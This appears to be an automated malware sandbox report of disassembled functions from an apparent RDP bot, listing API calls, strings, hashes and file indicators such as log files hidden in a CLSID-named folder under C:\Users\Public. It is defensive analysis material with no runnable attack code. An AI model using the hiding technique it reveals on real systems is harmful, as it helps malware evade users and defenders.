Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
API String ID: 3395718042-1297835036
Opcode ID: b0614e595e2ef35af0da5ab31b5bc4641b000a12823e34719f272f0289fdd3e6
Instruction ID: 3446df7952ef923491ba00410eccde7cdc74871520b3c0d932aefbf81c1d5a05
Opcode Fuzzy Hash: b0614e595e2ef35af0da5ab31b5bc4641b000a12823e34719f272f0289fdd3e6
Instruction Fuzzy Hash: 99513CA0F1C71786FA209720E8803BC6292EF45784F940437DADE577B6DE6DB986C701

Function 00007FFE126D794C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE126D796C
GetLastError.KERNEL32 ref: 00007FFE126D7AA0

Part of subcall function 00007FFE126D7400: GetModuleHandleExA.KERNEL32 ref: 00007FFE126D741E

strlen.MSVCRT ref: 00007FFE126D79BE
strlen.MSVCRT ref: 00007FFE126D79DA
strcat.MSVCRT ref: 00007FFE126D79F5
strlen.MSVCRT ref: 00007FFE126D79FD
strlen.MSVCRT ref: 00007FFE126D7A12
fopen.MSVCRT ref: 00007FFE126D7A38

Strings

P, xrefs: 00007FFE126D7B2A
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE126D7A65
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126D7A8A
debug_init, xrefs: 00007FFE126D7A5E, 00007FFE126D7A83, 00007FFE126D7AAB, 00007FFE126D7B70, 00007FFE126D7BE4
Done, xrefs: 00007FFE126D7BDD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE126D799E, 00007FFE126D79B4, 00007FFE126D79EB, 00007FFE126D7A08, 00007FFE126D7A57
log, xrefs: 00007FFE126D7A27
~, xrefs: 00007FFE126D7B25
[I] (%s) -> %s, xrefs: 00007FFE126D7BEB
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE126D7AB2
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE126D7B77
cnccli.l, xrefs: 00007FFE126D7A1A
, xrefs: 00007FFE126D7ABE

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$cnccli.l$debug_init$log$~
API String ID: 3395718042-315528054
Opcode ID: 92eb147a39bf0af526771b056e73237fb8298a1ca3136630c8ce15c9490be259
Instruction ID: c6b23c99fff702c524d5b8e809ed2ad5baf9465af827cc199772a7b8b53ebd66
Opcode Fuzzy Hash: 92eb147a39bf0af526771b056e73237fb8298a1ca3136630c8ce15c9490be259
Instruction Fuzzy Hash: E5513110E0CF8F86FB2A9B57AC903B81251AF55764F5400B2C58D0A6F6DEEDBA46C342

Function 00007FFE11EC14FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC151C
GetLastError.KERNEL32 ref: 00007FFE11EC1650

Part of subcall function 00007FFE11EC3A80: GetModuleHandleExA.KERNEL32 ref: 00007FFE11EC3A9E

strlen.MSVCRT ref: 00007FFE11EC156E
strlen.MSVCRT ref: 00007FFE11EC158A
strcat.MSVCRT ref: 00007FFE11EC15A5
strlen.MSVCRT ref: 00007FFE11EC15AD
strlen.MSVCRT ref: 00007FFE11EC15C2
fopen.MSVCRT ref: 00007FFE11EC15E8

Strings

[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE11EC1615
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE11EC154E, 00007FFE11EC1564, 00007FFE11EC159B, 00007FFE11EC15B8, 00007FFE11EC1607
P, xrefs: 00007FFE11EC16DA
dwlmgr.l, xrefs: 00007FFE11EC15CA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC163A
, xrefs: 00007FFE11EC166E
[I] (%s) -> %s, xrefs: 00007FFE11EC179B
Done, xrefs: 00007FFE11EC178D
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE11EC1662
log, xrefs: 00007FFE11EC15D7
~, xrefs: 00007FFE11EC16D5
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE11EC1727
debug_init, xrefs: 00007FFE11EC160E, 00007FFE11EC1633, 00007FFE11EC165B, 00007FFE11EC1720, 00007FFE11EC1794

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
API String ID: 3395718042-2859552336
Opcode ID: bffcd5c302662170ebc8467d71a59c3773c8c83dc28d067ab71bf50396376f41
Instruction ID: 0d7ec2c4cfff20c98281c36c7aa59994371ecaea9df3f46de6b2b014c8e2df33
Opcode Fuzzy Hash: bffcd5c302662170ebc8467d71a59c3773c8c83dc28d067ab71bf50396376f41
Instruction Fuzzy Hash: CD51EA50E0CE17D1FF205B97AC803BA125DAF46774F9860B6C90E066B1EE6CF945D341

Function 00007FFE0E16C9FC Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E16CA1C
GetLastError.KERNEL32 ref: 00007FFE0E16CB50

Part of subcall function 00007FFE0E16B930: GetModuleHandleExA.KERNEL32 ref: 00007FFE0E16B94E

strlen.MSVCRT ref: 00007FFE0E16CA6E
strlen.MSVCRT ref: 00007FFE0E16CA8A
strcat.MSVCRT ref: 00007FFE0E16CAA5
strlen.MSVCRT ref: 00007FFE0E16CAAD
strlen.MSVCRT ref: 00007FFE0E16CAC2
fopen.MSVCRT ref: 00007FFE0E16CAE8

Strings

, xrefs: 00007FFE0E16CB6E
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0E16CC27
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0E16CB62
~, xrefs: 00007FFE0E16CBD5
log, xrefs: 00007FFE0E16CAD7
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E16CB3A
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0E16CA4E, 00007FFE0E16CA64, 00007FFE0E16CA9B, 00007FFE0E16CAB8, 00007FFE0E16CB07
Done, xrefs: 00007FFE0E16CC8D
rdpctl.l, xrefs: 00007FFE0E16CACA
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0E16CB15
debug_init, xrefs: 00007FFE0E16CB0E, 00007FFE0E16CB33, 00007FFE0E16CB5B, 00007FFE0E16CC20, 00007FFE0E16CC94
[I] (%s) -> %s, xrefs: 00007FFE0E16CC9B
P, xrefs: 00007FFE0E16CBDA

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$rdpctl.l$~
API String ID: 3395718042-1794035234
Opcode ID: 6027abe810c91d6276c2aaa921a9be34cca8ee7fe377f6c5f3108819849dfb22
Instruction ID: cde0a4fe7b768f3fe95b3f89205d6ea1666cbe0cad51e2798928e9c30ca13b89
Opcode Fuzzy Hash: 6027abe810c91d6276c2aaa921a9be34cca8ee7fe377f6c5f3108819849dfb22
Instruction Fuzzy Hash: 6E514D60E1C707C1FB609B55F9803B99261AF58B84FA45033C9CD466B7EE6DB98AC3C1

Function 00007FFE0EB49F6C Relevance: 36.9, APIs: 8, Strings: 13, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB49F8C
GetLastError.KERNEL32 ref: 00007FFE0EB4A0C0

Part of subcall function 00007FFE0EB44AC0: GetModuleHandleExA.KERNEL32 ref: 00007FFE0EB44ADE

strlen.MSVCRT ref: 00007FFE0EB49FDE
strlen.MSVCRT ref: 00007FFE0EB49FFA
strcat.MSVCRT ref: 00007FFE0EB4A015
strlen.MSVCRT ref: 00007FFE0EB4A01D
strlen.MSVCRT ref: 00007FFE0EB4A032
fopen.MSVCRT ref: 00007FFE0EB4A058

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE0EB49FBE, 00007FFE0EB49FD4, 00007FFE0EB4A00B, 00007FFE0EB4A028, 00007FFE0EB4A077
Done, xrefs: 00007FFE0EB4A1FD
, xrefs: 00007FFE0EB4A0DE
debug_init, xrefs: 00007FFE0EB4A07E, 00007FFE0EB4A0A3, 00007FFE0EB4A0CB, 00007FFE0EB4A190, 00007FFE0EB4A204
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FFE0EB4A0D2
prgmgr.l, xrefs: 00007FFE0EB4A03A
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4A0AA
~, xrefs: 00007FFE0EB4A145
[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FFE0EB4A197
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FFE0EB4A085
log, xrefs: 00007FFE0EB4A047
P, xrefs: 00007FFE0EB4A14A
[I] (%s) -> %s, xrefs: 00007FFE0EB4A20B

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
API String ID: 3395718042-2735303109
Opcode ID: 0f974067a7b01bfcb567c9b154fe3c9fed70ccc92048bb515eb0e9eca9cefbbc
Instruction ID: f88535bcff432729d4c9be8b4681dcf8c30f64bac30f4d9a76e2e46d6225df47
Opcode Fuzzy Hash: 0f974067a7b01bfcb567c9b154fe3c9fed70ccc92048bb515eb0e9eca9cefbbc
Instruction Fuzzy Hash: F95156D2B4C71382FB329F54A8803B96655EF45784F840433DA8E463B2EE6DA94ACF01

Function 00007FFE13389AD2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE13389B2C
RegQueryValueExA.ADVAPI32 ref: 00007FFE13389C74

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

Strings

[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13389B4E
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE13389CA2
NULL, xrefs: 00007FFE13389CCE, 00007FFE13389F7C, 00007FFE13389F88
registry_get_value, xrefs: 00007FFE13389B47, 00007FFE13389BA0, 00007FFE13389BD3, 00007FFE13389C06, 00007FFE13389C39, 00007FFE13389C9B, 00007FFE13389DE6, 00007FFE13389F64
(value_sz != NULL), xrefs: 00007FFE13389C32
P, xrefs: 00007FFE13389D1F
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE13389B92, 00007FFE13389BC5, 00007FFE13389BF8, 00007FFE13389C2B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13389BA7, 00007FFE13389BDA, 00007FFE13389C0D, 00007FFE13389C40
, xrefs: 00007FFE13389CB7
(key != NULL), xrefs: 00007FFE13389BCC
(value != NULL), xrefs: 00007FFE13389BFF
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE13389DED
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE13389F6B
(root != NULL), xrefs: 00007FFE13389B99
P, xrefs: 00007FFE13389D28
, xrefs: 00007FFE13389CAE

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
Instruction ID: b225aa560ec1029663cda079ead0c46d196ad7f4065747b7d859ba0645c35e4e
Opcode Fuzzy Hash: 84e1102881e14aa1f1fe1744a6ea1b08f4cca0e5c6733abdbc1240c36314e2db
Instruction Fuzzy Hash: C0A1626190CF078DF6609746A4403BC6255AF64768F5002F2D93E76BB1EE6DE9C9C30E

Function 00007FFE0E133402 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE0E13345C
RegQueryValueExA.ADVAPI32 ref: 00007FFE0E1335A4

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE0E13389B
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE0E1335D2
NULL, xrefs: 00007FFE0E1335FE, 00007FFE0E1338AC, 00007FFE0E1338B8
P, xrefs: 00007FFE0E133658
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE0E1334C2, 00007FFE0E1334F5, 00007FFE0E133528, 00007FFE0E13355B
registry_get_value, xrefs: 00007FFE0E133477, 00007FFE0E1334D0, 00007FFE0E133503, 00007FFE0E133536, 00007FFE0E133569, 00007FFE0E1335CB, 00007FFE0E133716, 00007FFE0E133894
, xrefs: 00007FFE0E1335E7
(value != NULL), xrefs: 00007FFE0E13352F
(root != NULL), xrefs: 00007FFE0E1334C9
, xrefs: 00007FFE0E1335DE
(value_sz != NULL), xrefs: 00007FFE0E133562
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE0E13371D
P, xrefs: 00007FFE0E13364F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E1334D7, 00007FFE0E13350A, 00007FFE0E13353D, 00007FFE0E133570
(key != NULL), xrefs: 00007FFE0E1334FC
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE0E13347E

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: e4ee0b8c682a28aa6920e3dfb83186395f0b78e0f3a49e04670c579f188d5a39
Instruction ID: 2c8b2ff43641bc64481b6fc2e5ca9f3f6f7c3f00105af2e0659aa4aa7d5be45e
Opcode Fuzzy Hash: e4ee0b8c682a28aa6920e3dfb83186395f0b78e0f3a49e04670c579f188d5a39
Instruction Fuzzy Hash: 53A15FE1E0C74B96FA709724A8403B93250AF44744F640137DAFE467B1EEADFA85D30A

Function 00007FFE126DD3F2 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE126DD44C
RegQueryValueExA.ADVAPI32 ref: 00007FFE126DD594

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

(key != NULL), xrefs: 00007FFE126DD4EC
P, xrefs: 00007FFE126DD63F
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE126DD4B2, 00007FFE126DD4E5, 00007FFE126DD518, 00007FFE126DD54B
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE126DD46E
(value != NULL), xrefs: 00007FFE126DD51F
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126DD4C7, 00007FFE126DD4FA, 00007FFE126DD52D, 00007FFE126DD560
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE126DD5C2
(root != NULL), xrefs: 00007FFE126DD4B9
registry_get_value, xrefs: 00007FFE126DD467, 00007FFE126DD4C0, 00007FFE126DD4F3, 00007FFE126DD526, 00007FFE126DD559, 00007FFE126DD5BB, 00007FFE126DD706, 00007FFE126DD884
NULL, xrefs: 00007FFE126DD5EE, 00007FFE126DD89C, 00007FFE126DD8A8
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE126DD70D
(value_sz != NULL), xrefs: 00007FFE126DD552
P, xrefs: 00007FFE126DD648
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE126DD88B
, xrefs: 00007FFE126DD5D7
, xrefs: 00007FFE126DD5CE

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-3890537267
Opcode ID: c58dddacb13cd698f5fa2026c6a9a98a7888e7b119fb0002abfa16e503a29b1d
Instruction ID: 7cebe01bcea15db94eebf4fe5f89be2fa2a6f736a33d0c58442c74e04a7b98a1
Opcode Fuzzy Hash: c58dddacb13cd698f5fa2026c6a9a98a7888e7b119fb0002abfa16e503a29b1d
Instruction Fuzzy Hash: AAA1422690DF4F87FA20FB07AC407782250AF60764F5401B2D99E466F1EEEDE985C782

Function 00007FFE11ECBA62 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FFE11ECBABC
RegQueryValueExA.ADVAPI32 ref: 00007FFE11ECBC04

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11ECBEFB
P, xrefs: 00007FFE11ECBCB8
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE11ECBADE
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FFE11ECBC32
P, xrefs: 00007FFE11ECBCAF
(root != NULL), xrefs: 00007FFE11ECBB29
NULL, xrefs: 00007FFE11ECBC5E, 00007FFE11ECBF0C, 00007FFE11ECBF18
registry_get_value, xrefs: 00007FFE11ECBAD7, 00007FFE11ECBB30, 00007FFE11ECBB63, 00007FFE11ECBB96, 00007FFE11ECBBC9, 00007FFE11ECBC2B, 00007FFE11ECBD76, 00007FFE11ECBEF4
, xrefs: 00007FFE11ECBC47
(value != NULL), xrefs: 00007FFE11ECBB8F
(key != NULL), xrefs: 00007FFE11ECBB5C
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FFE11ECBD7D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11ECBB37, 00007FFE11ECBB6A, 00007FFE11ECBB9D, 00007FFE11ECBBD0
, xrefs: 00007FFE11ECBC3E
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE11ECBB22, 00007FFE11ECBB55, 00007FFE11ECBB88, 00007FFE11ECBBBB
(value_sz != NULL), xrefs: 00007FFE11ECBBC2

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
